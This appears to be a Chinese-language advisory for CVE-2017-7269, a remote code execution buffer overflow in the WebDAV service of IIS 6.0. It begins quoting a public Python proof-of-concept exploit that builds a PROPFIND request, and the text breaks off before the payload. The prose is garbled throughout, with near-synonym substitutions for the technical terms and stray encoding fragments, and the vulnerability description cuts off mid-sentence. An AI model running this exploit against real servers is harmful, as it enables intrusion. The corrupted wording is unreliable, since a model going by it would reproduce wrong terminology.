IIS 6.0 長途代碼履行0day,編號:CVE-2017-7269 (附PoC)
縫隙描繪
縫隙編號:CVE-2017-7269
發(fā)現(xiàn)人員:Zhiniang Peng和Chen Wu(華南理工大學(xué)信息安全實(shí)驗(yàn)室,計(jì)算機(jī)科學(xué)與工程學(xué)院)
縫隙簡述:敞開WebDAV服務(wù)的IIS 6.0被爆存在緩存區(qū)溢出縫隙導(dǎo)致長途代碼履行,現(xiàn)在對于 Windows Server 2003 R2 可以穩(wěn)定運(yùn)用,該縫隙最早在2016年7,8月份開端在野外被運(yùn)用。
縫隙類型:緩沖區(qū)溢出
縫隙等級:高危
影響商品:Microsoft Windows Server 2003 R2 敞開WebDAV服務(wù)的IIS6.0(現(xiàn)在已驗(yàn)證,別的版本尚未驗(yàn)證)
觸發(fā)函數(shù):ScStoragePathFromUrl函數(shù)
附加信息:ScStoragePathFromUrl函數(shù)被調(diào)用了兩次
縫隙細(xì)節(jié):在Windows Server 2003的IIS6.0的WebDAV服務(wù)的ScStoragePathFromUrl函數(shù)存在緩存區(qū)溢出縫隙,攻擊者經(jīng)過一個(gè)以“If:
PoC(來源網(wǎng)絡(luò)https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py)
#------------Our payload set up a ROP chain by using the overflow 3 times. It will launch a calc.exe which shows the bug is really dangerous.
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China
#-----------Email: edwardz@foxmail.com
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1',80))
pay='PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
pay+='If:
| 
